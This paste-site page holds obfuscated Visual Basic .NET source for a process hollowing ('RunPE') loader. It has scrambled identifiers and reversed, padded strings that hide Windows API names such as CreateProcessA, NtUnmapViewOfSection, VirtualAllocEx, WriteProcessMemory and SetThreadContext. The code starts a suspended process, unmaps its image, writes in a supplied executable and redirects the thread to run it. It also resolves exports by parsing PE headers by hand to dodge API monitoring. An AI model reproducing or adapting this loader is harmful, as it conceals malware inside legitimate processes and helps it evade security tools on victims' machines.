
This site has been acquired by Toptal
(Attention! API endpoint has changed)
Save New Duplicate & Edit Just Text1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
Imports System
Imports System.Collections
Imports System.Diagnostics
Imports System.Linq
Imports System.Runtime.InteropServices
Imports System.Text
Imports Microsoft.VisualBasic
Imports Microsoft.VisualBasic.CompilerServices

Public Class extFxjBywKFqdIi

    Private Shared Function RXyIFGmXbHJAxKP(ModuleName As String) As IntPtr
        If Not ModuleName.Contains(".dll") Then
            ModuleName += ".dll"
        End If
        Try
            For Each obj As Object In Process.GetCurrentProcess().Modules
                Dim processModule As ProcessModule = CType(obj, ProcessModule)
                If Operators.CompareString(processModule.ModuleName.ToLower(), ModuleName, False) = 0 Then
                    Return processModule.BaseAddress
                End If
            Next
        Finally
            Dim enumerator As IEnumerator
            If TypeOf enumerator Is IDisposable Then
                TryCast(enumerator, IDisposable).Dispose()
            End If
        End Try
        Return extFxjBywKFqdIi.aTLiBYcmDUxzleo(ModuleName)
    End Function

    Private Shared Function JiXTzeqejMrHJXc(Of DelegateInstance)(wHZKQGIyoPEcTXD As String, ZnVJVDEORulRgpL As String) As DelegateInstance
        Return Conversions.ToGenericParameter(Of DelegateInstance)(Marshal.GetDelegateForFunctionPointer(CType(extFxjBywKFqdIi.jZnCWrSKIEaNkRO(CLng(extFxjBywKFqdIi.RXyIFGmXbHJAxKP(wHZKQGIyoPEcTXD)), ZnVJVDEORulRgpL), IntPtr), GetType(DelegateInstance)))
    End Function

    Private Shared Function zKmSMxKcVsMumyI(Address As IntPtr, Size As Integer) As Byte()
        Dim array As Byte() = New Byte(Size - 1 + 1 - 1) {}
        Marshal.Copy(Address, array, 0, Size)
        Return array
    End Function


    Private Shared Function jZnCWrSKIEaNkRO(TdATcTjfSRybWvI As Long, Export As String) As Long
        Dim value As Byte() = Nothing
        If IntPtr.Size = 4 Then

            value = extFxjBywKFqdIi.zKmSMxKcVsMumyI(CType((TdATcTjfSRybWvI + CLng(Marshal.ReadInt32(CType((TdATcTjfSRybWvI + CLng(Marshal.ReadInt32(CType((TdATcTjfSRybWvI + 60L), IntPtr))) + 120L), IntPtr))) + 24L), IntPtr), 16)
        End If
        If IntPtr.Size = 8 Then

            value = extFxjBywKFqdIi.zKmSMxKcVsMumyI(CType((TdATcTjfSRybWvI + CLng(Marshal.ReadInt32(CType((TdATcTjfSRybWvI + CLng(Marshal.ReadInt32(CType((TdATcTjfSRybWvI + 60L), IntPtr))) + 136L), IntPtr))) + 24L), IntPtr), 16)
        End If
        Dim aHmTzLLQNQGTTtk As Integer = BitConverter.ToInt32(value, 0)
        For i As Integer = 0 To aHmTzLLQNQGTTtk

            Dim aHmTzLLQNQGTTtk2 As Integer = Marshal.ReadInt32(CType((CLng(BitConverter.ToInt32(value, 8)) + TdATcTjfSRybWvI + CLng((i * 4))), IntPtr))
            Dim left As String = Encoding.ASCII.GetString(extFxjBywKFqdIi.zKmSMxKcVsMumyI(CType((TdATcTjfSRybWvI + CLng(aHmTzLLQNQGTTtk2)), IntPtr), 64)).Split(New Char(0) {})(0)
            Dim aHmTzLLQNQGTTtk3 As Integer = CInt(BitConverter.ToInt16(extFxjBywKFqdIi.zKmSMxKcVsMumyI(CType((CLng(BitConverter.ToInt32(value, 12)) + TdATcTjfSRybWvI + CLng((i * 2))), IntPtr), 2), 0))
            If Operators.CompareString(left, Export, False) = 0 Then

                Return CLng(BitConverter.ToInt32(extFxjBywKFqdIi.zKmSMxKcVsMumyI(CType((CLng(BitConverter.ToInt32(value, 4)) + TdATcTjfSRybWvI + CLng((aHmTzLLQNQGTTtk3 * 4))), IntPtr), 4), 0)) + TdATcTjfSRybWvI
            End If
        Next
        Return 0L
    End Function


    Public Shared Function EDgvdnTbVGCAdNl(path As String, cmd As String, CCVRjJXjvtBEPkI As Byte(), TOmgUrprRLtnhPZ As Boolean) As Boolean
        Dim wHZKQGIyoPEcTXD As String = extFxjBywKFqdIi.FvLHYjunqpAOUlY(New String() {"QvOAUXgpowAWzNallQvOAUXgpowAWzNad.23lQvOAUXgpowAWzNaenreQvOAUXgpowAWzNak", "QvOAUXgpowAWzNa"})
        Dim UoDpivftoKdGKPC As String = extFxjBywKFqdIi.FvLHYjunqpAOUlY(New String() {"SGRBgDPPXufkLGcllSGRBgDPPXufkLGcd.llSGRBgDPPXufkLGcdtn", "SGRBgDPPXufkLGc"})
        Dim ZnVJVDEORulRgpL As String = extFxjBywKFqdIi.FvLHYjunqpAOUlY(New String() {"AsstTLxpGHcOOZFsgtecortTLxpGHcOOZFsgtPetatTLxpGHcOOZFsgterCtTLxpGHcOOZFsgt", "tTLxpGHcOOZFsgt"})
        Dim ZnVJVDEORulRgpL2 As String = extFxjBywKFqdIi.FvLHYjunqpAOUlY(New String() {"MuaQrPxTEqVgrbJtxetMuaQrPxTEqVgrbJnoCdMuaQrPxTEqVgrbJaerMuaQrPxTEqVgrbJhTtMuaQrPxTEqVgrbJeG", "MuaQrPxTEqVgrbJ"})
        Dim ZnVJVDEORulRgpL3 As String = extFxjBywKFqdIi.FvLHYjunqpAOUlY(New String() {"txHqELXBKXspLdCIcetnoCHqELXBKXspLdCIcdaerhTHqELXBKXspLdCIcteSHqELXBKXspLdCIc", "HqELXBKXspLdCIc"})
        Dim ZnVJVDEORulRgpL4 As String = extFxjBywKFqdIi.FvLHYjunqpAOUlY(New String() {"txsEzhkKvjiwAGcUxetnxsEzhkKvjiwAGcUoCdaexsEzhkKvjiwAGcUrhTteGxsEzhkKvjiwAGcU46wxsEzhkKvjiwAGcUoW", "xsEzhkKvjiwAGcU"})
        Dim ZnVJVDEORulRgpL5 As String = extFxjBywKFqdIi.FvLHYjunqpAOUlY(New String() {"txaQVaHEWgIrBshwfetnoaQVaHEWgIrBshwfCdaaQVaHEWgIrBshwferhTaQVaHEWgIrBshwfteS46aQVaHEWgIrBshwfwoW", "aQVaHEWgIrBshwf"})
        Dim ZnVJVDEORulRgpL6 As String = extFxjBywKFqdIi.FvLHYjunqpAOUlY(New String() {"lugwtxwNPZxQUxayrolugwtxwNPZxQUxameMsselugwtxwNPZxQUxacorPlugwtxwNPZxQUxadaeR", "lugwtxwNPZxQUxa"})
        Dim ZnVJVDEORulRgpL7 As String = extFxjBywKFqdIi.FvLHYjunqpAOUlY(New String() {"yrWEQtOQcxAtaMwcfomeMWEQtOQcxAtaMwcfssWEQtOQcxAtaMwcfecorWEQtOQcxAtaMwcfPetirW", "WEQtOQcxAtaMwcf"})
        Dim ZnVJVDEORulRgpL8 As String = extFxjBywKFqdIi.FvLHYjunqpAOUlY(New String() {"nNxTERXUfjryYbVfoitNxTERXUfjryYbVfceSfOweNxTERXUfjryYbVfiVpamNxTERXUfjryYbVfnUtNNxTERXUfjryYbVf", "NxTERXUfjryYbVf"})
        Dim ZnVJVDEORulRgpL9 As String = extFxjBywKFqdIi.FvLHYjunqpAOUlY(New String() {"xEcICiCUSxJCjJRADSollICiCUSxJCjJRADSAlICiCUSxJCjJRADSautICiCUSxJCjJRADSriV", "ICiCUSxJCjJRADS"})
        Dim ZnVJVDEORulRgpL10 As String = extFxjBywKFqdIi.FvLHYjunqpAOUlY(New String() {"dlAkjMURkBYBuhBQaelAkjMURkBYBuhBQrhTlAkjMURkBYBuhBQemulAkjMURkBYBuhBQseRlAkjMURkBYBuhBQ", "lAkjMURkBYBuhBQ"})
        Dim PfkJoAsJYCgqOue As extFxjBywKFqdIi.sVwVFXyOHhkoRpI = extFxjBywKFqdIi.JiXTzeqejMrHJXc(Of extFxjBywKFqdIi.sVwVFXyOHhkoRpI)(wHZKQGIyoPEcTXD, ZnVJVDEORulRgpL)
        Dim apblGSnrJgMmCyT As extFxjBywKFqdIi.apblGSnrJgMmCyT = extFxjBywKFqdIi.JiXTzeqejMrHJXc(Of extFxjBywKFqdIi.apblGSnrJgMmCyT)(wHZKQGIyoPEcTXD, ZnVJVDEORulRgpL2)
        Dim YPHlrIUfSvIGxBw As extFxjBywKFqdIi.YPHlrIUfSvIGxBw = extFxjBywKFqdIi.JiXTzeqejMrHJXc(Of extFxjBywKFqdIi.YPHlrIUfSvIGxBw)(wHZKQGIyoPEcTXD, ZnVJVDEORulRgpL4)
        Dim gzvNShSRQSEenKN As extFxjBywKFqdIi.gzvNShSRQSEenKN = extFxjBywKFqdIi.JiXTzeqejMrHJXc(Of extFxjBywKFqdIi.gzvNShSRQSEenKN)(wHZKQGIyoPEcTXD, ZnVJVDEORulRgpL3)
        Dim FvkoJVgATAFeJpT As extFxjBywKFqdIi.FvkoJVgATAFeJpT = extFxjBywKFqdIi.JiXTzeqejMrHJXc(Of extFxjBywKFqdIi.FvkoJVgATAFeJpT)(wHZKQGIyoPEcTXD, ZnVJVDEORulRgpL5)
        Dim GyRUpdXJiecbfCb As extFxjBywKFqdIi.hLpizNMKAGbTMom = extFxjBywKFqdIi.JiXTzeqejMrHJXc(Of extFxjBywKFqdIi.hLpizNMKAGbTMom)(wHZKQGIyoPEcTXD, ZnVJVDEORulRgpL6)
        Dim TlQSnMLpHIuzJaZ As extFxjBywKFqdIi.zCVZKMWINaUywNM = extFxjBywKFqdIi.JiXTzeqejMrHJXc(Of extFxjBywKFqdIi.zCVZKMWINaUywNM)(wHZKQGIyoPEcTXD, ZnVJVDEORulRgpL7)
        Dim YIbSGOoEfANGEDC As extFxjBywKFqdIi.YIbSGOoEfANGEDC = extFxjBywKFqdIi.JiXTzeqejMrHJXc(Of extFxjBywKFqdIi.YIbSGOoEfANGEDC)(UoDpivftoKdGKPC, ZnVJVDEORulRgpL8)
        Dim BohgWDJFfGKCxHA As extFxjBywKFqdIi.BohgWDJFfGKCxHA = extFxjBywKFqdIi.JiXTzeqejMrHJXc(Of extFxjBywKFqdIi.BohgWDJFfGKCxHA)(wHZKQGIyoPEcTXD, ZnVJVDEORulRgpL9)
        Dim nMWlMNqMwKFSnCr As extFxjBywKFqdIi.tNFTHKKrDaKcujs = extFxjBywKFqdIi.JiXTzeqejMrHJXc(Of extFxjBywKFqdIi.tNFTHKKrDaKcujs)(wHZKQGIyoPEcTXD, ZnVJVDEORulRgpL10)
        Dim GztPAusJEXvbMPc As String = String.Format("""{0}""", path)
        Dim GIcBEQNiJsEuOKo As extFxjBywKFqdIi.GIcBEQNiJsEuOKo = Nothing
        Dim sMPjQWQJuFVrufZ As extFxjBywKFqdIi.sMPjQWQJuFVrufZ = Nothing
        GIcBEQNiJsEuOKo.Size = CUInt(Marshal.SizeOf(GetType(extFxjBywKFqdIi.GIcBEQNiJsEuOKo)))
        Try
            If Not String.IsNullOrEmpty(cmd) Then
                GztPAusJEXvbMPc = GztPAusJEXvbMPc + " " + cmd
            End If
            If Not PfkJoAsJYCgqOue(path, GztPAusJEXvbMPc, IntPtr.Zero, IntPtr.Zero, False, 4UI, IntPtr.Zero, Nothing, GIcBEQNiJsEuOKo, sMPjQWQJuFVrufZ) Then
                Throw New Exception()
            End If
            Dim aHmTzLLQNQGTTtk As Integer = BitConverter.ToInt32(CCVRjJXjvtBEPkI, 60)
            Dim aHmTzLLQNQGTTtk2 As Integer = BitConverter.ToInt32(CCVRjJXjvtBEPkI, aHmTzLLQNQGTTtk + 52)
            Dim array As Integer() = New Integer(178) {}
            array(0) = 65538
            If IntPtr.Size = 4 Then
                If Not apblGSnrJgMmCyT(sMPjQWQJuFVrufZ.ThreadHandle, array) Then
                    Throw New Exception()
                End If
            ElseIf Not YPHlrIUfSvIGxBw(sMPjQWQJuFVrufZ.ThreadHandle, array) Then
                Throw New Exception()
            End If
            Dim aHmTzLLQNQGTTtk3 As Integer = array(41)
            Dim aHmTzLLQNQGTTtk4 As Integer
            Dim aHmTzLLQNQGTTtk5 As Integer
            If Not GyRUpdXJiecbfCb(sMPjQWQJuFVrufZ.ProcessHandle, aHmTzLLQNQGTTtk3 + 8, aHmTzLLQNQGTTtk4, 4, aHmTzLLQNQGTTtk5) Then
                Throw New Exception()
            End If
            If aHmTzLLQNQGTTtk2 = aHmTzLLQNQGTTtk4 AndAlso YIbSGOoEfANGEDC(sMPjQWQJuFVrufZ.ProcessHandle, aHmTzLLQNQGTTtk4) <> 0 Then
                Throw New Exception()
            End If
            Dim length As Integer = BitConverter.ToInt32(CCVRjJXjvtBEPkI, aHmTzLLQNQGTTtk + 80)
            Dim bufferSize As Integer = BitConverter.ToInt32(CCVRjJXjvtBEPkI, aHmTzLLQNQGTTtk + 84)
            Dim aHmTzLLQNQGTTtk6 As Integer = BohgWDJFfGKCxHA(sMPjQWQJuFVrufZ.ProcessHandle, aHmTzLLQNQGTTtk2, length, 12288, 64)
            Dim flag As Boolean
            If TOmgUrprRLtnhPZ AndAlso aHmTzLLQNQGTTtk6 = 0 Then
                flag = True
                aHmTzLLQNQGTTtk6 = BohgWDJFfGKCxHA(sMPjQWQJuFVrufZ.ProcessHandle, 0, length, 12288, 64)
            End If
            If aHmTzLLQNQGTTtk6 = 0 Then
                Throw New Exception()
            End If
            If Not TlQSnMLpHIuzJaZ(sMPjQWQJuFVrufZ.ProcessHandle, aHmTzLLQNQGTTtk6, CCVRjJXjvtBEPkI, bufferSize, aHmTzLLQNQGTTtk5) Then
                Throw New Exception()
            End If
            Dim aHmTzLLQNQGTTtk7 As Integer = aHmTzLLQNQGTTtk + 248
            Dim aHmTzLLQNQGTTtk8 As Integer = CInt((BitConverter.ToInt16(CCVRjJXjvtBEPkI, aHmTzLLQNQGTTtk + 6) - 1S))
            For i As Integer = 0 To aHmTzLLQNQGTTtk8
                Dim aHmTzLLQNQGTTtk9 As Integer = BitConverter.ToInt32(CCVRjJXjvtBEPkI, aHmTzLLQNQGTTtk7 + 12)
                Dim aHmTzLLQNQGTTtk10 As Integer = BitConverter.ToInt32(CCVRjJXjvtBEPkI, aHmTzLLQNQGTTtk7 + 16)
                Dim srcOffset As Integer = BitConverter.ToInt32(CCVRjJXjvtBEPkI, aHmTzLLQNQGTTtk7 + 20)
                If aHmTzLLQNQGTTtk10 <> 0 Then


                    Dim array2 As Byte() = New Byte(aHmTzLLQNQGTTtk10 - 1 + 1 - 1) {}
                    Buffer.BlockCopy(CCVRjJXjvtBEPkI, srcOffset, array2, 0, array2.Length)
                    If Not TlQSnMLpHIuzJaZ(sMPjQWQJuFVrufZ.ProcessHandle, aHmTzLLQNQGTTtk6 + aHmTzLLQNQGTTtk9, array2, array2.Length, aHmTzLLQNQGTTtk5) Then
                        Throw New Exception()
                    End If
                End If
                aHmTzLLQNQGTTtk7 += 40
            Next
            Dim bytes As Byte() = BitConverter.GetBytes(aHmTzLLQNQGTTtk6)
            If Not TlQSnMLpHIuzJaZ(sMPjQWQJuFVrufZ.ProcessHandle, aHmTzLLQNQGTTtk3 + 8, bytes, 4, aHmTzLLQNQGTTtk5) Then
                Throw New Exception()
            End If
            Dim aHmTzLLQNQGTTtk11 As Integer = BitConverter.ToInt32(CCVRjJXjvtBEPkI, aHmTzLLQNQGTTtk + 40)
            If flag Then
                aHmTzLLQNQGTTtk6 = aHmTzLLQNQGTTtk2
            End If
            array(44) = aHmTzLLQNQGTTtk6 + aHmTzLLQNQGTTtk11
            If IntPtr.Size = 4 Then
                If Not gzvNShSRQSEenKN(sMPjQWQJuFVrufZ.ThreadHandle, array) Then
                    Throw New Exception()
                End If
            ElseIf Not FvkoJVgATAFeJpT(sMPjQWQJuFVrufZ.ThreadHandle, array) Then
                Throw New Exception()
            End If
            If nMWlMNqMwKFSnCr(sMPjQWQJuFVrufZ.ThreadHandle) = -1 Then
                Throw New Exception()
            End If
        Catch ex As Exception
            Dim processById As Process = Process.GetProcessById(CInt(sMPjQWQJuFVrufZ.ProcessId))
            If processById IsNot Nothing Then
                processById.Kill()
            End If
            Return False
        End Try
        Return True
    End Function
    Private Shared Function FvLHYjunqpAOUlY(input As String()) As String
        Dim GztPAusJEXvbMPc As String = input.First()
        Dim oldValue As String = input.Last()
        Return Strings.StrReverse(GztPAusJEXvbMPc.Replace(oldValue, String.Empty))
    End Function

    Public Shared Function jPxoDnNPDYLyKuR(path As String, cmd As String, CCVRjJXjvtBEPkI As Byte()) As Boolean
        extFxjBywKFqdIi.EDgvdnTbVGCAdNl(path, cmd, CCVRjJXjvtBEPkI, True)
        Return True
    End Function

    Private Shared FmafZfmkMJOYvLv As String = extFxjBywKFqdIi.FvLHYjunqpAOUlY(New String() {"extFxjBywKFqdIi23extFxjBywKFqdIilenrextFxjBywKFqdIiekextFxjBywKFqdIi", "extFxjBywKFqdIi"})

    Private Shared gLRfQyeQAOIuyIK As String = extFxjBywKFqdIi.FvLHYjunqpAOUlY(New String() {"PREHMUBfdTwqaQlAyrPREHMUBfdTwqaQlarbiPREHMUBfdTwqaQlLdaPREHMUBfdTwqaQloLPREHMUBfdTwqaQl", "PREHMUBfdTwqaQl"})

    Private Shared aTLiBYcmDUxzleo As extFxjBywKFqdIi.HabJGFnXOWSJZXS = extFxjBywKFqdIi.JiXTzeqejMrHJXc(Of extFxjBywKFqdIi.HabJGFnXOWSJZXS)(extFxjBywKFqdIi.FmafZfmkMJOYvLv, extFxjBywKFqdIi.gLRfQyeQAOIuyIK)

    Private Delegate Function HabJGFnXOWSJZXS(wHZKQGIyoPEcTXD As String) As IntPtr

    Private Delegate Function sVwVFXyOHhkoRpI(applicationName As String, commandLine As String, processAttributes As IntPtr, threadAttributes As IntPtr, inheritHandles As Boolean, creationFlags As UInteger, environment As IntPtr, currentDirectory As String, ByRef startupInfo As extFxjBywKFqdIi.GIcBEQNiJsEuOKo, ByRef processInformation As extFxjBywKFqdIi.sMPjQWQJuFVrufZ) As Boolean

    Private Delegate Function apblGSnrJgMmCyT(thread As IntPtr, context As Integer()) As Boolean

    Private Delegate Function YPHlrIUfSvIGxBw(thread As IntPtr, context As Integer()) As Boolean

    Private Delegate Function gzvNShSRQSEenKN(thread As IntPtr, context As Integer()) As Boolean

    Private Delegate Function FvkoJVgATAFeJpT(thread As IntPtr, context As Integer()) As Boolean

    Private Delegate Function hLpizNMKAGbTMom(process As IntPtr, X2GC6M As Integer, ByRef buffer As Integer, bufferSize As Integer, ByRef bytesRead As Integer) As Boolean


    Private Delegate Function zCVZKMWINaUywNM(process As IntPtr, X2GC6M As Integer, buffer As Byte(), bufferSize As Integer, ByRef bytesWritten As Integer) As Boolean

    Private Delegate Function YIbSGOoEfANGEDC(process As IntPtr, X2GC6M As Integer) As Integer

    Private Delegate Function BohgWDJFfGKCxHA(handle As IntPtr, address As Integer, length As Integer, type As Integer, protect As Integer) As Integer

    Private Delegate Function tNFTHKKrDaKcujs(handle As IntPtr) As Integer

    <StructLayout(LayoutKind.Sequential, Pack:=1)>
    Private Structure sMPjQWQJuFVrufZ

        Public ProcessHandle As IntPtr

        Public ThreadHandle As IntPtr

        Public ProcessId As UInteger

        Public ThreadId As UInteger
    End Structure

    <StructLayout(LayoutKind.Sequential, Pack:=1)>
    Private Structure GIcBEQNiJsEuOKo

        Public Size As UInteger

        Public Reserved1 As String

        Public Desktop As String

        Public Title As String

        <MarshalAs(UnmanagedType.ByValArray, SizeConst:=36)>
        Public Misc As Byte()

        Public Reserved2 As IntPtr

        Public StdInput As IntPtr

        Public StdOutput As IntPtr

        Public StdError As IntPtr
    End Structure
End Class
